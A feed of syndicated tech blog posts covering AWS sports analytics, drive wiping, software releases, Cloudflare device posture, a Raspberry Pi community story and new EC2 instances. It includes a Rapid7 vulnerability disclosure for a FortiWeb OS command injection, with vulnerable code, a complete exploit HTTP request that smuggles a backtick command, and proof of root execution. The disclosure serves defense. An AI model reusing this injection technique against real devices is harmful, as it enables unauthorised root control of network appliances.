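            payload["prediction_ts"] = datetime.fromtimestamp(
                payload["prediction_ts"], tz=timezone.utc
            ).isoformat()
        output.append({
            "recordId": record["recordId"],
            "result": "Ok",  # "Dropped" and "ProcessingFailed" are the other valid results
            "data": base64.b64encode(json.dumps(payload).encode()).decode(),
        })
    return {"records": output}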

For more complex transformations, AWS Glue can be used. For example, once the data lands in Amazon S3, you can start preparing and aggregating the training dataset using Amazon SageMaker Data Wrangler. As part of the feature engineering process, you can do the following:

  • Transform the data
  • Delete unneeded columns
  • Impute missing values
  • Perform label encoding
  • Use the quick model option to get a sense of which features are adding predictive power as you progress with your data preparation

All the data preparation and feature engineering tasks can be performed from Data Wrangler’s single visual interface.

Once data is prepared in Amazon S3, Amazon SageMaker can be used for model training. In soccer, you can predict a goal percentage based on the player’s position, acceleration, and past performance history.  SageMaker provides several built-in algorithms that can be trained. For real-time predictions, Amazon API Gateway provides an API layer to clients like an OTT, broadcasting service, or a web browser. API Gateway can invoke a Lambda function, with logic to call a SageMaker endpoint and persist the output to the database. This data can be used later on for further analysis or to fine-tune your models.

Figure 2. Deliver real-time prediction using Amazon SageMaker
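
The Lambda function behind API Gateway in Figure 2 can call the model through the SageMaker runtime API. The following is a minimal sketch; the endpoint name, environment variable, and payload shape are hypothetical:

import json
import os

import boto3

runtime = boto3.client("sagemaker-runtime")
ENDPOINT_NAME = os.getenv("ENDPOINT_NAME", "goal-probability-endpoint")  # hypothetical endpoint

def lambda_handler(event, context):
    # Features such as player position and acceleration arrive in the API request body
    features = json.loads(event.get("body") or "{}")
    response = runtime.invoke_endpoint(
        EndpointName=ENDPOINT_NAME,
        ContentType="application/json",
        Body=json.dumps(features),
    )
    prediction = response["Body"].read().decode()
    # Persisting the prediction for later analysis (as described above) is omitted here
    return {"statusCode": 200, "body": prediction}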

Computer vision-based object detection techniques can be very useful in sports. These techniques use deep learning algorithms to predict pass probability, player face-offs, or the likelihood of a win. For the sports industry, object detection technologies like these are crucial because they obviate the need for sensors. Real-time object identification can be used to:

  • Generate new advanced analytics regarding player and team performance
  • Aid game officials in making correct calls
  • Provide fans an improved and more data-rich viewing experience

Read Football tracking in the NFL with Amazon SageMaker for more information on how to track using broadcast video data. Using SageMaker, you can train object detection models that analyze thousands of images. You can then locate and classify the football itself, and distinguish it from background objects.

Creating a graphics overlay

When you have the ML inference data and video ingestion ready, you may want to represent this data on your broadcasted video. The graphic overlay feature lets you insert an image (a BMP, PNG, or TGA file) at a specified time. It is displayed as a static overlay on the underlying video for a specified duration. The motion graphic overlay feature lets you insert an animation (a MOV or SWF file, or a series of PNG files) on the underlying video. This can be displayed at a specified time for a specified duration.

For example, a player’s motion prediction can be inserted on video during a game, through a RESTful API call of ML inferences. You can use AWS Elemental Live to achieve this. Read about AWS Elemental Live Graphic Overlay at AWS documentation.

Reducing latency

You may want to reduce latency for analytics such as for player health and safety. Use video, data, or machine learning processing at the arena using AWS Outposts. You can also use AWS Wavelength along with 5G infrastructure. For more information, read Catch Important Moments in Sports with 5G and AWS Wavelength.

Summary

In this blog, we’ve highlighted how customers in the sports industry are using AWS to increase the quality of the game, and enhance the sports fan’s experience. The following benefits can be achieved by building a data pipeline for tracking sporting events using AWS services:

  • Amazon Kinesis collects, processes, and analyzes in-game streaming data in real time. This way both teams and fans get timely insights and can react quickly to new information.
  • The serverless nature of this architecture enables a cost-effective, scalable, and operationally efficient environment for customers.
  • Machine learning services like Amazon SageMaker can be used to enrich the fan viewing experience by presenting in-game predictions such as who will score next, or which team will win the game.

Visit our AWS Sports Partnerships page for more information on how AWS is changing the game.

Getting Rid of Your PC? Here’s How to Wipe a Windows SSD or Hard Drive

Post Syndicated from Molly Clancy original https://www.backblaze.com/blog/how-to-wipe-pc-ssd-or-hard-drive/

Securely Erasing PC Drives

Are you hanging on to an old PC because you don’t know how to scrub the hard drive clean of all your personal information? Worried there’s data lurking around in there even after you empty the recycle bin? (Yes, there is.)

You always have the option of taking a baseball bat to the thing. Truly, physical destruction is one way to go (more on that later). But, there are much easier and more reliable, if less satisfying, ways to make sure your Windows PC is as clean as the day it left the factory.

First Things First: Back Up

Before you break out the Louisville Slugger (or follow our simple steps below), make sure your data is backed up as part of a 3-2-1 backup strategy where you keep three copies of your data on two types of media with one off-site. Your first copy is the one on your computer. Your second copy can be kept on an external hard drive or other external media. And the third copy should be kept in an off-site location like the cloud. If you’re not backing up an off-site copy, now is a great time to get started.

Windows 7, 8, 8.1, 10, and 11 all have basic utilities you can use to create a local backup on an external hard drive that you can use to move your files to a new computer or just to have a local backup for safekeeping. Once you’re backed up, you’re ready to wipe your PC’s internal hard drive.

How to Completely Wipe a PC

First, you’ll need to figure out if your Windows PC has a hard disk drive (HDD) or solid state drive (SSD). Most desktops and laptops sold in the last few years will have an SSD, but you can easily find out to be sure:

  1. Open Settings.
  2. Type “Defragment” in the search bar.
  3. Click on “Defragment and Optimize Your Drives.”
  4. Check the media type of your drive.

screenshot for selecting drive to wipe clean

How to Erase Your Windows Drive

Now that you know what kind of drive you have, there are two options for wiping your PC:

  1. Reset: In most cases, wiping a PC is as simple as reformatting the disk and reinstalling Windows using the Reset function. If you’re just recycling, donating, or selling your PC, the Reset function makes it acceptably difficult for someone to recover your data, especially if it’s also encrypted. This can be done easily in Windows versions 8, 8.1, 10, and 11 for either an HDD or an SSD.
  2. Secure Erase Using Third-party Tools: If Reset doesn’t make you feel completely comfortable that your data can’t be recovered, or if you have a PC running Windows 7 or older, you have another option. There are a number of good third-party tools you can use to securely erase your disk, which we’ll get into below. These are different depending on whether you have an HDD or an SSD.

Follow these instructions for different versions of Windows to reset your PC:

How to Wipe a Windows 10 and 11 Hard Drive

  1. Go to Settings → System (Update & Security in Windows 10) → Recovery.
  2. Under “Reset this PC” click “Reset.” (Click “Get Started” in Windows 10.)
  3. Choose “Remove everything.” (If you’re not getting rid of your PC, you can use “Keep my files” to give your computer a good cleaning to improve performance.)
  4. You will be prompted to choose to reinstall Windows via “Cloud download” or “Local reinstall.” If you’re feeling generous and want to give your PC’s next owner a fresh version of Windows, choose “Cloud download.” This will use internet data. If you’re planning to recycle your PC, “Local reinstall” works just fine.
  5. In “Additional settings,” click “Change settings” and toggle “Clean data” to on. This takes longer, but it’s the most secure option.
  6. Click “Reset” to start the process.

How to Wipe a Windows 8 and 8.1 Hard Drive

  1. Go to Settings → Change PC Settings → Update and Recovery → Recovery.
  2. Under “Remove everything and reinstall Windows,” click “Get started,” then click “Next.”
  3. Select “Fully clean the drive.” This takes longer, but it’s the most secure option.
  4. Click “Reset” to start the process.

Secure Erase Using Third-party Tools

If your PC is running an older version of Windows or if you just want to have more control over the erasure process, there are a number of open-source third-party tools to wipe your PC hard drive, depending on whether you have an HDD or an SSD.

Secure Erase an HDD

The process for erasing an HDD involves overwriting the data, and there are many utilities out there to do it yourself:

  1. DBAN: Short for Darik’s Boot and Nuke, DBAN has been around for years and is a well-known and trusted drive wipe utility for HDDs. It does multiple pass rewrites (binary ones and zeros) on the disk. You’ll need to download it to a USB drive and run it from there.
  2. Disk Wipe: Disk Wipe is another free utility that does multiple rewrites of binary data. You can choose from a number of different methods for overwriting your disk. Disk Wipe is also portable, so you don’t need to install it to use it.
  3. Eraser: Eraser is also free to use. It gives you the most control over how you erase your disk. Like Disk Wipe, you can choose from different methods that include varying numbers of rewrites, or you can define your own.

Keep in mind, any disk erase utility that does multiple rewrites is going to take quite a while to complete.

If you’re using Windows 7 or older and you’re just looking to recycle your PC, you can stop here. If you intend to sell or donate your PC, you’ll need the original installation discs (yes, that’s discs with a “c”…remember? Those round shiny things?) to reinstall a fresh version of Windows.

Secure Erase an SSD

If you have an SSD, you may want to take the time to encrypt your data before erasing it to make sure it can’t be recovered. Why? The way SSDs store and retrieve data is different from HDDs.

HDDs store data in a physical location on the drive platter. SSDs store data using electronic circuits and individual memory cells organized into pages and blocks. Writing and rewriting to the same blocks over and over wears out the drive over time. So, SSDs use “wear leveling” to write across the entire drive, meaning your data is not stored in one physical location—it’s spread out.

When you tell an SSD to erase your data, it doesn’t overwrite said data, but instead writes new data to a new block. This has implications for erasing your SSD: some of your data might hang around on the SSD even after you’ve told it to be erased, until wear leveling decides the cells in that block can be overwritten. As such, it’s good practice to encrypt your data on an SSD before erasing it. That way, if any data is left lurking, at least no one will be able to read it without an encryption key.

You don’t have to encrypt your data first, but if Windows Reset is not enough for you and you’ve come this far, we figure it’s a step you’d want to take. Even if you’re not getting rid of your computer or if you have an HDD, encrypting your data is a good idea. If your laptop falls into the wrong hands, encryption makes it that much harder for criminals to access your personal information.

Encrypting your data isn’t complicated, but not every Windows machine is the same. First, check to see if your device is encrypted by default:

  1. Open the Start menu.
  2. Scroll to the “Windows Administrative Tools” dropdown menu.
  3. Select “System Information.” You can also search for “system information” in the taskbar.
  4. If the “Device Encryption Support” value is “Meets prerequisites,” you’re good to go—encryption is enabled on your device.

If not, your next step is to check if your device has BitLocker built in:

  1. Open Settings.
  2. Type “BitLocker” in the search bar.
  3. Click “Manage BitLocker.”
  4. Click “Turn on BitLocker” and follow the prompts.

If neither of those options are available, you can use third-party software to encrypt your internal SSD. VeraCrypt and AxCrypt are both good options. Just remember to record the encryption passcode somewhere and also the OS, OS version, and encryption tool used so you can recover the files later on if desired.

Once you’ve encrypted your data, your next step is to erase, and you have a few options:

  1. Parted Magic: Parted Magic is the most regularly recommended third-party erase tool for SSDs, but it does cost $11. It’s a bootable tool like some of the HDD erase tools—you have to download it to a USB drive and run it from there.
  2. ATA Secure Erase: ATA Secure Erase is a command that basically shocks your SSD. It uses a voltage spike to flush stored electrons. While this sounds damaging (and it does cause some wear), it’s perfectly safe. It doesn’t overwrite the data like other secure erase tools, so there’s actually less damage done to the SSD.

The Nuclear Option

When nothing less than total destruction will do, just make sure you do it safely. I asked around to see if our team could recommend the best way to bust up your drive. Our Senior Systems Administrator, Tim Lucas, is partial to explosives, but we don’t recommend it. You can wipe an HDD with a magnet, otherwise known as “degaussing,” but a regular old fridge magnet won’t work. You’ll need to open up your PC and get at the hard drive itself, and you’ll need a neodymium magnet—one that’s strong enough to obliterate digits (both the ones on your hard drive and the ones on your hand) in the process. Not the safest way to go, either.

If you’re going to tear apart your PC to get at the HDD anyway, drilling some holes through the platter or giving it an acid bath are better options, as our CEO, Gleb Budman, explained in this Scientific American article. Drilling holes distorts the platter, and acid eats away at its surface. Both render an HDD unreadable.

Finally, we still stand by our claim that the safest and most secure way to destroy an HDD, and the only way we’d recommend physically destroying an SSD, is to shred it. Check with your local electronics recycling center to see if they have a shredder you can use (or if they’ll at least let you watch as giant metal gears chomp down on your drive). Shredding it should be a last resort though. Drives typically last five to 10 years, and millions get shredded every year before the end of their useful life. While blowing up your hard drive is probably a blast, we’re pretty sure you can find something even more fun to do with that old drive.

Still have questions about how to securely erase or destroy your hard drives? Let us know in the comments.

The post Getting Rid of Your PC? Here’s How to Wipe a Windows SSD or Hard Drive appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/866567/rss

Security updates have been issued by Fedora (firefox), openSUSE (cpio and rpm), Oracle (compat-exiv2-026, exiv2, firefox, kernel, kernel-container, qemu, sssd, and thunderbird), Red Hat (cloud-init, edk2, kernel, kpatch-patch, microcode_ctl, and sssd), and SUSE (cpio, firefox, and libcares2).

Fortinet FortiWeb OS Command Injection

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/08/17/fortinet-fortiweb-os-command-injection/

An OS command injection vulnerability in FortiWeb’s management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is an instance of CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) and has a CVSSv3 base score of 8.7. This vulnerability appears to be related to CVE-2021-22123, which was addressed in FG-IR-20-120.

Product Description

Fortinet FortiWeb is a web application firewall (WAF), designed to catch both known and unknown exploits targeting the protected web applications before they have a chance to execute. More about FortiWeb can be found at the vendor’s website.

Credit

This issue was discovered by researcher William Vu of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

An attacker, who is first authenticated to the management interface of the FortiWeb device, can smuggle commands using backticks in the “Name” field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. The affected code is noted below:

int move_metafile(char *path, char *name)
{
    int iVar1;
    char buf[512];
    int nret;

    /* "name" comes straight from the user-supplied SAML server Name field */
    snprintf(buf, 0x200, "%s/%s", "/data/etc/saml/shibboleth/service_providers", name);
    iVar1 = access(buf, 0);
    if (iVar1 != 0) {
        /* the unsanitized "name" is interpolated into a shell command */
        snprintf(buf, 0x200, "mkdir %s/%s", "/data/etc/saml/shibboleth/service_providers", name);
        iVar1 = system(buf);
        if (iVar1 != 0) {
            return iVar1;
        }
    }
    snprintf(buf, 0x200, "cp %s %s/%s/%s.%s", path, "/data/etc/saml/shibboleth/service_providers", name,
             "Metadata", &DAT_00212758);
    iVar1 = system(buf);
    return iVar1;
}

The HTTP POST request and response below demonstrates an example exploit of this vulnerability:

POST /api/v2.0/user/remoteserver.saml HTTP/1.1
Host: [redacted]
Cookie: [redacted]
User-Agent: [redacted]
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/root/user/remote-user/saml-user/
X-Csrftoken: 814940160
Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412
Content-Length: 3068
Origin: https://[redacted]
Dnt: 1
Te: trailers
Connection: close

-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="q_type"

1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="name"

`touch /tmp/vulnerable`
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="entityID"

test
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="service-path"

/saml.sso
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-lifetime"

8
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-timeout"

30
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind"

post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind_val"

1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-path"

/SAML2/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind"

post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind_val"

1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-path"

/SLO/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="flag"

0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing"

disable
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing_val"

0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="metafile"; filename="test.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2021-06-12T16:54:31Z" cacheDuration="PT1623948871S" entityID="test">
  <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
    <md:KeyDescriptor use="signing">
      <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:X509Data>
          <ds:X509Certificate>test</ds:X509Certificate>
        </ds:X509Data>
      </ds:KeyInfo>
    </md:KeyDescriptor>
    <md:KeyDescriptor use="encryption">
      <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
        <ds:X509Data>
          <ds:X509Certificate>test</ds:X509Certificate>
        </ds:X509Data>
      </ds:KeyInfo>
    </md:KeyDescriptor>
    <md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>
    <md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="test"/>
  </md:IDPSSODescriptor>
</md:EntityDescriptor>
-----------------------------94351131111899571381631694412--

HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Jun 2021 11:59:45 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: [redacted]
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: frame-ancestors 'self'
X-Content-Type-Options: nosniff
Content-Length: 20
Strict-Transport-Security: max-age=63072000
Connection: close

{"errcode": "-651"}

Note that the smuggled ‘touch’ command is concatenated into the mkdir shell command:

[pid 12867] execve("/migadmin/cgi-bin/fwbcgi", ["/migadmin/cgi-bin/fwbcgi"], 0x55bb0395bf00 /* 42 vars */) = 0
[pid 13934] execve("/bin/sh", ["sh", "-c", "mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`"], 0x7fff56b1c608 /* 42 vars */) = 0
[pid 13935] execve("/bin/touch", ["touch", "/tmp/vulnerable"], 0x55774aa30bf8 /* 44 vars */) = 0
[pid 13936] execve("/bin/mkdir", ["mkdir", "/data/etc/saml/shibboleth/service_providers/"], 0x55774aa30be8 /* 44 vars */) = 0

Finally, the results of the ‘touch’ command can be seen on the local command line of the FortiWeb device:

/# ls -l /tmp/vulnerable
-rw-r--r--    1 root     0                0 Jun 10 11:59 /tmp/vulnerable
/#

Impact

An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ. Note, though, that Rapid7 researchers were only able to identify fewer than three hundred of these devices in total that appear to expose their management interfaces to the general internet.

Note that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication bypass issue, such as CVE-2020-29015.

Remediation

In the absence of a patch, users are advised to disable the FortiWeb device’s management interface from untrusted networks, which would include the internet. Generally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway — instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.

Git 2.33.0 released

Post Syndicated from original https://lwn.net/Articles/866524/rss

Version 2.33.0
of the Git source-code management system has been released.

As can be seen here, it turns out that this release does not have
many end-user facing changes and new features, but a lot of fixes
and internal improvements went into the codebase during this cycle.
Also, preparation for a new merge strategy backend (can be used
with “git merge -sort” today) is on its final stretch and we are
hoping that it can become the default in the next release.

6 New Ways to Validate Device Posture

Post Syndicated from Kyle Krum original https://blog.cloudflare.com/6-new-ways-to-validate-device-posture/

Cloudflare for Teams gives your organization the ability to build rules that determine who can reach specified resources. When we first launched, those rules primarily relied on identity. This helped our customers replace their private networks with a model that evaluated every request for who was connecting, but this lacked consideration for how they were connecting.

In March, we began to change that. We announced new integrations that give you the ability to create rules that consider the device as well. Starting today, we’re excited to share that you can now build additional rules that consider several different factors about the device, like its OS, patch status, and domain join or disk encryption status. This has become increasingly important over the last year as more and more people began connecting from home. Powered by the Cloudflare WARP agent, your team now has control over more health factors about the devices that connect to your applications.

Zero Trust is more than just identity

With Cloudflare for Teams, administrators can replace their Virtual Private Networks (VPNs), where users on the network were trusted, with an alternative that does not trust any connection by default—also known as a Zero Trust model.

Customers start by connecting the resources they previously hosted on a private network to Cloudflare’s network using Cloudflare Tunnel. Cloudflare Tunnel uses a lightweight connector that creates an outbound-only connection to Cloudflare’s edge, removing the need to poke holes in your existing firewall.

Once connected, administrators can build rules that apply to each and every resource and application, or even a part of an application. Cloudflare’s Zero Trust network evaluates every request and connection against the rules that an administrator created before the user is ever allowed to reach that resource.

For example, an administrator can create a rule that limits who can reach an internal reporting tool to users in a specific Okta group, connecting from an approved country, and only when they log in with a hard key as their second factor. Cloudflare’s global network enforces those rules close to the user, in over 200 cities around the world, to make a comprehensive rule like the one outlined above feel seamless to the end-user.

Today’s launch adds new types of signals your team can use to define these rules. By definition, a Zero Trust model considers every request or connection to be “untrusted.” Only the rules that you create determine what is considered trusted and allowed. Now, we’re excited to let users take this a step further and create rules that not only focus on trusting the user, but also the security posture of the device they are connecting from.

More (and different) factors are better

Building rules based on device posture covers a blind spot for your applications and data. If I’m allowed to reach a particular resource, without any consideration for the device I’m using, then I could log in with my corporate credentials from a personal device running an unpatched or vulnerable version of an operating system. I might do that because it is convenient, but I am creating a much bigger problem for my team if I then download data that could be compromised because of that device.

That posture can also change based on the destination. For example, maybe you are comfortable if a team member uses any device to review a new splash page for your marketing campaign. However, if a user is connecting to an administrative tool that manages customer accounts, you want to make sure that device complies with your security policies for customer data that include factors like disk encryption status. With Cloudflare for Teams, you can apply rules that contain multiple and different factors with that level of per-resource granularity.

Today, we are thrilled to announce six additional posture types on top of the ones you can already set:

  1. Endpoint Protection Partners — Verify that your users are running one of our Endpoint Protection Platform providers (Carbon Black, CrowdStrike, SentinelOne, Tanium)
  2. Serial Number — Allow devices only from your known inventory pool
  3. Cloudflare WARP’s proxy — Determine if your users are connected via our encrypted WARP tunnel (Free, Paid or any Teams account)
  4. Cloudflare’s secure web gateway — Determine if your users are connecting from a device managed by your HTTP Filtering policies
  5. (NEW) Application Check — Verify any program of your choice is running on the device
  5. (NEW) File Check — Ensure a particular file is present on the device (such as an updated signature, OS patch, etc.); a brief illustrative sketch of this kind of check follows this list
  7. (NEW) Disk Encryption — Ensure all physical disks on the device are encrypted
  8. (NEW) OS Version — Confirm users have upgraded to a specific operating system version
  9. (NEW) Firewall — Check that a firewall is configured on the device
  10. (NEW) Domain Joined — Verify that your Windows devices are joined to the corporate directory
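
To make the File Check idea above more concrete, here is a minimal, purely illustrative sketch of the kind of client-side test an endpoint agent could perform; it assumes nothing about how Cloudflare’s WARP agent is actually implemented, and the file path and freshness window are hypothetical:

#include <stdio.h>
#include <time.h>
#include <sys/stat.h>

/* Illustrative only: report whether a required file exists and was updated
 * recently enough (e.g., an antivirus signature database).
 * Returns 1 if the posture check passes, 0 if it fails. */
static int file_posture_check(const char *path, double max_age_seconds)
{
    struct stat st;

    if (stat(path, &st) != 0) {
        /* File is missing entirely: posture check fails. */
        return 0;
    }

    double age = difftime(time(NULL), st.st_mtime);
    return age <= max_age_seconds;
}

int main(void)
{
    /* Hypothetical example: signatures must have been updated in the last 7 days. */
    const char *sig_file = "/var/lib/example-av/signatures.db";
    int ok = file_posture_check(sig_file, 7.0 * 24 * 60 * 60);

    printf("file check: %s\n", ok ? "pass" : "fail");
    return ok ? 0 : 1;
}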

Device rules should be as simple as identity rules

Cloudflare for Teams device rules can be configured in the same place that you control identity-based rules. Let’s use the Disk Encryption posture check as an example. You may want to create a rule that enforces the Disk Encryption check when your users need to download and store files on their devices locally.

To build that rule, first visit the Cloudflare for Teams dashboard and navigate to the Devices section of the “My Team” page. Then, choose “Disk Encryption” as a new attribute to add.

You can enter a descriptive name for this attribute. For example, this rule should require Windows disk encryption, while others might require encryption on other platforms.

To save time, you can also create reusable rules, called Groups, to include multiple types of device posture check for reference in new policies later on.

Now that you’ve created your group, you can create a Zero Trust Require rule to apply your Disk Encryption checks. To do that, navigate to Access > Applications and create a new application. If you already have your application in place, simply edit your application to add a new rule. In the “Assign a group” section you will see the group you just created—select it and choose a Require rule type. Finally, save the rule to begin enforcing granular, Zero Trust device posture checks on every request in your environment.

What’s next

Get started with exploring all device posture attributes in our developer docs. Note that not every posture type is currently available on every operating system; support varies by platform.

Is there a posture type we’re missing that you’d love to have? We’d love to hear from you in the Community.

Celebrating the community: Toshan

Post Syndicated from Katie Gouskos original https://www.raspberrypi.org/blog/community-stories-toshan-coding-mentor/

Today we bring you the fourth film in our series of inspirational community stories! Incredible young people from the community have collaborated with us to create these videos, where they tell their tech stories in their own words.

Toshan, an Indian teenager in Bangalore.
Toshan had community support when he started learning to code, so now he mentors other young people at his CoderDojo club.

Watch the new film to meet a “mischievous” tech creator who is helping other young people in his community to use technology to bring their ideas to life.

This is Toshan

Toshan’s story takes place in his hometown of Bangalore, India, where his love for electronics and computing sent him on a journey of tech discovery! 

Help us celebrate Toshan by liking and sharing his story on Twitter, LinkedIn, or Facebook!

Toshan (16) first encountered coding aged 12, thanks to his computing teacher Miss Sonya. Describing his teacher, he says: “The unique thing is, she just doesn’t stop where the syllabus ends.” The world of digital making and Raspberry Pi computers that Miss Sonya introduced him to offered Toshan “limitless opportunities”, and he felt inspired to throw himself into learning.

“If we help people with their ideas, they might bring something new into the world.”

Toshan

Having found help in his local community and the online Raspberry Pi Foundation community that enabled him to start his tech journey, Toshan decided to pass on his skills: he set up a CoderDojo for other young people in Bangalore when he was 14. Toshan says, “I wanted to give something back.” Mentoring others as they learn coding and digital making helped his confidence grow. Toshan loves supporting the learners at his Dojo with problem-solving because “if we help people with their ideas, they might bring something new into the world.”

Toshan, an Indian teenager, with his mother and father.

Supported by his mum and dad, Toshan’s commitment to helping others create with technology is leading him to extend his community beyond the city he calls home. Through his YouTube channel, he reaches people outside of Bangalore, and he has connected with a worldwide community of like-minded young tech creators by taking part in Coolest Projects online 2020 with an automated hand sanitiser he built.

Toshan’s enthusiasm and love for tech are already motivating him to empower others, and he has only just begun! We are delighted to be a part of his journey and can’t wait to see what he does next.

Help us celebrate Toshan by liking and sharing his story on Twitter, LinkedIn, or Facebook!

The post Celebrating the community: Toshan appeared first on Raspberry Pi.

Go 1.17 is released

Post Syndicated from original https://lwn.net/Articles/866496/rss

The Go blog has announced the release of version 1.17 of the Go programming language. The new version brings some fairly small changes to the language itself, adds support for the 64-bit Arm architecture on Windows, and includes other features, bug fixes, and more:

This release brings additional improvements to the compiler, namely a new way of passing function arguments and results. This change has shown about a 5% performance improvement in Go programs and reduction in binary sizes of around 2% for amd64 platforms. Support for more platforms will come in future releases.

See the
release notes for more information.

New – Amazon EC2 M6i Instances Powered by the Latest-Generation Intel Xeon Scalable Processors

Post Syndicated from Danilo Poccia original https://aws.amazon.com/blogs/aws/new-amazon-ec2-m6i-instances-powered-by-the-latest-generation-intel-xeon-scalable-processors/

Last year, we introduced the sixth generation of EC2 instances powered by AWS-designed Graviton2 processors. We’re now expanding our sixth-generation offerings to include x86-based instances, delivering price/performance benefits for workloads that rely on x86 instructions.

Today, I am happy to announce the availability of the new general purpose Amazon EC2 M6i instances, which offer up to 15% improvement in price/performance versus comparable fifth-generation instances. The new instances are powered by the latest generation Intel Xeon Scalable processors (code-named Ice Lake) with an all-core turbo frequency of 3.5 GHz.

You might have noticed that we’re now using the “i” suffix in the instance type to specify that the instances are using an Intel processor. We already use the suffix “a” for AMD processors (for example, M5a instances) and “g” for Graviton processors (for example, M6g instances).

Compared to M5 instances using an Intel processor, this new instance type provides:

  • A larger instance size (m6i.32xlarge) with 128 vCPUs and 512 GiB of memory that makes it easier and more cost-efficient to consolidate workloads and scale up applications.
  • Up to 15% improvement in compute price/performance.
  • Up to 20% higher memory bandwidth.
  • Up to 40 Gbps for Amazon Elastic Block Store (EBS) and 50 Gbps for networking.
  • Always-on memory encryption.

M6i instances are a good fit for running general-purpose workloads such as web and application servers, containerized applications, microservices, and small data stores. The higher memory bandwidth is especially useful for enterprise applications, such as SAP HANA, and high performance computing (HPC) workloads, such as computational fluid dynamics (CFD).

M6i instances are also SAP-certified. For over eight years, SAP customers have been relying on the Amazon EC2 M family of instances for their mission-critical SAP workloads. With M6i instances, customers can achieve up to 15% better price/performance for SAP applications than with M5 instances.

M6i instances are available in nine sizes (the m6i.metal size is coming soon):

Name            vCPUs   Memory (GiB)   Network Bandwidth (Gbps)   EBS Throughput (Gbps)
m6i.large         2         8          Up to 12.5                 Up to 10
m6i.xlarge        4        16          Up to 12.5                 Up to 10
m6i.2xlarge       8        32          Up to 12.5                 Up to 10
m6i.4xlarge      16        64          Up to 12.5                 Up to 10
m6i.8xlarge      32       128          12.5                       10
m6i.12xlarge     48       192          18.75                      15
m6i.16xlarge     64       256          25                         20
m6i.24xlarge     96       384          37.5                       30
m6i.32xlarge    128       512          50                         40

The new instances are built on the AWS Nitro System, which is a collection of building blocks that offloads many of the traditional virtualization functions to dedicated hardware, delivering high performance, high availability, and highly secure cloud instances.

For optimal networking performance on these new instances, upgrade your Elastic Network Adapter (ENA) drivers to version 3. For more information, see this article about how to get maximum network performance on sixth-generation EC2 instances.

M6i instances support Elastic Fabric Adapter (EFA) on the m6i.32xlarge size for workloads that benefit from lower network latency, such as HPC and video processing.

Availability and Pricing
EC2 M6i instances are available today in six AWS Regions: US East (N. Virginia), US West (Oregon), US East (Ohio), Europe (Ireland), Europe (Frankfurt), and Asia Pacific (Singapore). As usual with EC2, you pay for what you use. For more information, see the EC2 pricing page.

Danilo
